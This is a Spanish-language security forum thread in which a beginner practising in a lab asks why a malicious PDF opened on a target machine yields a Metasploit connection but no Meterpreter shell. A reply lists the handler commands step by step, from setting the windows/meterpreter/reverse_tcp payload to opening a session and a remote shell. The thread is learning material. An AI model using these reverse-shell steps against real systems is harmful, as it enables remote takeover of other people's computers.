una duda sobre error de mertepreter

Iniciado por maximuzve, Enero 16, 2018, 03:04:03 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Enero 16, 2018, 03:04:03 AM Ultima modificación: Enero 16, 2018, 05:29:22 AM por Gabriela
hola amigos buenas noches .. vengo por una duda estoy practicando recién entro en el mundo de la seguridad informática muy humildemente vengo por una ayuda por cuando ejecuto en el sistema operativo ataque el archivo pdf , pero en la sesión del kali me aparece conectado y abierto pero no pasa de hay?  no aparece metepreter para entrar a la shell a esto me refiero gracias


Primero que nada no se entiente bien tu pregunta, asi q voy a tratar de responder deacuerdo a lo q veo en tu imagen. Si estas trabajando con un solo objetivo (WinXP en VM) no deberias tener 4 sesiones esperando conexion, para estar recien empezando te puede confundir. O si estas explotando mas de una vulnerabilidad usa "-j" para moverte a una sesion especifica.  Ahora usa "run" en lugar de "shell", tambien te aconsejo q revises desde el principio tanto tu explotacion como la documentacion que esta tiene.

Saludos...............

amigo la sesión  que dice 4 es por cada vez que en el equipo al cual estoy realizando el ataque abría el archivo pdf y marca como 4 veces y lo que sucede amigo es que en la documentación que estoy guiando la persona al realizar este ultimo pase se la abre la sesión en la shell de meterpreter pero como tu ves se me conecta para no me abre... para en ese momento darle shell cuando escribio cualquier cosa en la cosa o doy un espacio se devuelve a msf exploit (handler) gracias

Para abrir una shell:
Código: text
set payload windows/meterpreter/reverse_tcp

luego
Código: text
show options

tienes q visualizar las opciones de "Payload options (windows/meterpreter/reverse_tcp):" que tiene q ser igual a tu pdf.
luego (aqui empieza tu imagen)
Código: text
exploit

va correr las primeras 7 lineas de tu imagen y vuelve al handler
luego
Código: text
sessions -i 1

con eso deberias posicionarte en meterpreter, escribes "help"
luego
Código: text
shell

y listo ya tienes la shell en tu terminal